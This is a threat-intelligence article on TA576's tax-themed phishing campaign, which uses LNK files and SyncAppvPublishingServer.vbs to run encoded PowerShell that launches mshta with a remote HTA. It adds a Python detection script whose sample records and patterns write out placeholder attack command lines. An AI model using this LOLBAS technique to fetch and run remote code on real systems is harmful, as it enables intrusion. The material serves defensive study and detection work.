TA576's Tax-Season Assault with New SyncAppvPublishingServer Attack Strategy
Embracing the yearly ritual of tax-themed phishing, a new campaign has emerged that targets organizations associated with accounting and financial services. Security researchers Tommy Madjar and Selena Larson at Proofpoint have detailed a campaign attributed to the threat actor TA576, a group that operates on a predictable calendar: according to Proofpoint, TA576 is "only active the first few months of the year during U.S. tax season." TA576 focuses on North American organizations, and its lures are built around tax-preparation services.
In the recent campaigns in January 2024, TA576 used a compromised account to send emails whose reply-to address pointed to a newly registered domain, presumably controlled by the threat actor. The initial email is benign and is designed to elicit a response from recipients willing to offer their services. Once a recipient replies, the threat actor supplies a malicious Google Firebase URL. If clicked, the URL leads to the download of a zipped shortcut (LNK) file. Executing the shortcut initiates an attack chain built largely on Living Off The Land Binaries and Scripts (LOLBAS); the notable technique is the use of SyncAppvPublishingServer.vbs to execute PowerShell commands without invoking PowerShell itself. "If this shortcut was executed, it ran encoded PowerShell via the SyncAppvPublishingServer.vbs LOLBAS inject. The PowerShell command launched Mshta to run the HTML application (HTA) payload from a provided URL," Proofpoint explains.
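From a detection standpoint, the chain above leaves a distinctive process lineage: a script host running SyncAppvPublishingServer.vbs, and an mshta.exe descendant given a remote URL. The following is an added example, not Proofpoint's tooling or any artifact from the campaign: it runs simple rules over constructed Sysmon-style process-creation records (hypothetical PIDs, paths and placeholder arguments) and assumes, only for the sample data, that powershell.exe sits between the script host and mshta.exe; the ancestor walk does not depend on that.

```python
import re

# Constructed process-creation records (hypothetical PIDs, paths and placeholder
# arguments), not telemetry from the campaign. Assumed sample chain:
# explorer.exe (LNK click) -> wscript.exe (SyncAppvPublishingServer.vbs)
# -> powershell.exe -> mshta.exe. The ancestor walk below works for any depth.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 101, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Windows\System32\SyncAppvPublishingServer.vbs" "<argument-placeholder>"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -EncodedCommand <base64-placeholder>"},
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": "mshta.exe https://example.invalid/page.hta"},
    {"pid": 200, "ppid": 1,   "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},   # local HTA: not flagged
]

SYNCAPPV_VBS = re.compile(r"syncappvpublishingserver\.vbs", re.I)
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# mshta handed an http(s) URL or a UNC path as its first argument
MSHTA_REMOTE = re.compile(r'mshta(\.exe)?"?\s+"?(https?://|\\\\)', re.I)


def ancestors(event, by_pid):
    """Yield parent, grandparent, ... of event; the seen-set guards against PID-reuse loops."""
    seen, ppid = set(), event["ppid"]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        yield by_pid[ppid]
        ppid = by_pid[ppid]["ppid"]


def detect(events):
    """Return (rule, pid) pairs for the LOLBAS chain described in the Proofpoint report."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = e["image"].lower()
        if image.endswith(SCRIPT_HOSTS) and SYNCAPPV_VBS.search(e["cmd"]):
            # App-V clients run this script from a scheduled task; baseline that
            # invocation, and treat any other script-host execution as suspect.
            alerts.append(("syncappv_vbs_via_script_host", e["pid"]))
        if image.endswith("mshta.exe") and MSHTA_REMOTE.search(e["cmd"]):
            alerts.append(("mshta_remote_hta", e["pid"]))
            if any(SYNCAPPV_VBS.search(a["cmd"]) for a in ancestors(e, by_pid)):
                alerts.append(("mshta_descends_from_syncappv_vbs", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The lineage rule is the high-confidence signal; the two single-process rules are noisier on hosts that legitimately use App-V or local HTAs, so tune them against your own baseline.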